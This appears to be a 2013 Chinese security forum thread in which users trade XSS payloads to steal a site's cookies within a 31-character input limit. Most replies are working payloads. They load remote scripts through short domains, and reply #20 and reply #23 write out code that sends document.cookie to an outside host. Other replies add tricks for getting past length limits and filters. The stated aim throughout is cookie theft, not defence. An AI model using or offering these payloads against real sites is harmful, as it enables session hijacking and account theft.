31字符xss挑战
vakin | 2013-11-21 12:13
要求能或得cookie,cookie啊。
<script src=http://></script>
都去了29个了。
相关讨论:
1#
木易耳朵 | 2013-11-21 12:17
<script/src=//></script>
2#
Noxxx | 2013-11-21 12:23
<script src=http:t.cn/8aaaaa0>
3#
chord | 2013-11-21 12:30
去http://和</script>
4#
爱上平顶山 (爱上平顶山) | 2013-11-21 12:38
换换思路吧
5#
wugui (摄像头已贴标签ฏ็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ฏ็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ฏ็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็ฏ็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็็) | 2013-11-21 12:57
@Noxxx 这样还有效吗,
6#
whirlwind | 2013-11-21 12:59
<script src=> 13个字符
http;// 7个
你只需要搞一个10个字符的域名,推荐in
7#
vakin | 2013-11-21 13:14
@whirlwind 短域名可以么 @爱上平顶山 给点提示么
8#
齐迹 (换一个容易记住的头像@VIP @nauscript) | 2013-11-21 13:58
@whirlwind script 不闭合 无效的。
<script src=//1234567></script>
9#
YKS () | 2013-11-21 14:02
maxlength="24"
10#
坏虾 (黑阔都被爆菊花~) | 2013-11-21 14:04
x.c.gp/x
11#
坏虾 (黑阔都被爆菊花~) | 2013-11-21 14:07
<script/src=//x.c.gp ></script>
12#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-11-21 14:20
<script src=http:lcx.cc></script>
极限了。。
13#
坏虾 (黑阔都被爆菊花~) | 2013-11-21 14:22
@核攻击 使用FTP,或许还能再少一个字符
14#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-11-21 14:23
这个得看具体情况吧,也可以配合页面其他元素。
<script>eval(x.value)</script>
15#
mramydnei | 2013-11-21 14:58
如果输出点后面还有其它标签切有<script></script>,比如:
<script src=//t.cn/z88SPHq
<a href=http://www.baidu.com>link</a>
<script>document.write("test")</script>
那这样就够了吧。
<script src=//t.cn/z88SPHq 【26个字符】
16#
vakin | 2013-11-21 15:02
@核攻击 已经查看,不能配合其他元素了。。
17#
核攻击 (统治全球,奴役全人类!毁灭任何胆敢阻拦的有机生物!) | 2013-11-21 15:07
楼主还是把具体页面源码贴上来吧……
18#
vakin | 2013-11-21 15:10
多谢楼上各位,我来总结一下,最后综合,我马上要去测试这个了。看来找个短域名是关键。
<script src=//1234567></script>
@坏虾 特别再at一下,你得短域名怎么挖出来得。
19#
vakin | 2013-11-21 15:14
@坏虾 找到了。
20#
xsjswt | 2013-11-21 15:14
<script> xx=/* xxxxxx */document.cookie;/* yyyyy */o="img";/* xxxxxx */ oo=document;/* xxxxxxxx */o=oo.createElement(o);/* xxxxxxxxxxxx */o.src=xxxxxxxx
21#
vakin | 2013-11-21 15:52
@xsjswt 哈哈,不错。我觉得wooyun除了感谢之外,应该加一个赞功能。
22#
vakin | 2013-11-21 15:52
@核攻击 不方便啊,核总。
23#
laterain | 2013-11-21 16:31
<script>x='http://'</script> <script>x+='xx/x'</script> <script>x+='?c='</script> <script>y='document.'</script> <script>y+='cookie'</script> <script>x+=eval(y)</script> <script>z=new image()</script> <script>z.src=x</script>
So easy
24#
vakin | 2013-11-21 16:50
@laterain 妙啊
25#
Black-Hole (我的嘴唇最要滋润下...) | 2013-11-21 16:51
@齐迹 </script>可以不要。浏览器会在你插的下面找到</script>并自动闭合,只不过其他地方的<script >闭合不了。楼主,你可以用filler截包,看字节是不是只在客户端限制。如果服务端没有限制字符,则可以成功插入。
@laterain 如果这个xss默认只显示最近一次的查询记录,你的就不行了。
如果都不行,你可以换种方法,用短短的获取第三方js文件的代码。看能不能搞到一个可控js,那样就没有字数限制了
26#
小泽 | 2013-11-21 17:44
@whirlwind 25位的怎么破
27#
爱梅小礼 | 2013-11-21 18:12
后面可以不闭合
28#
whirlwind | 2013-11-21 19:59
@小泽 简单,元素审查,改成250
29#
0x0F (..............................................................................................................) | 2013-11-21 21:31
<script/src=//x.xx/
不要闭合直接引用 自己数长度。 。
30#
剑无名 | 2013-11-21 23:05
@mramydnei 你这个标签前后没闭合啊
31#
剑无名 | 2013-11-21 23:38
@mramydnei 是不是前面的<会和后面的<script>的>进行匹配。然后和后面的</>进行闭合?
32#
剑无名 | 2013-11-21 23:41
@mramydnei 也不对啊。还是混乱了。。求指教。
33#
剑无名 | 2013-11-21 23:44
@Black-Hole 其他地方的<script>无法闭合会造成啥后果。前面已经闭合的script标签是否还会执行?
34#
Black-Hole (我的嘴唇最要滋润下...) | 2013-11-22 11:48
@剑无名 前面闭合的可以执行,后面的不会执行,只是会出错。但,只要钓到cookie,那点错误又算的了什么
35#
Black_Sun | 2013-11-22 14:43
跟我一个当时的例子一样 只不过我可以多行输出 每次稍微多点 有四十个字符! 但是不能一下凑出个script 我是这样弄的!
并且也过滤了 = 号!
1.<script>/*
2.*/$.getScript('//xss.tw/x');/*
3.*/</script>
然后就成功过了! 可能跟LZ的情况不太一样 但是根据具体情况 有所改变吧!
36#
过客 | 2013-11-30 03:18
23 个字符
<svg/onload=eval(name)>
27 个字符
<script>eval(name)</script>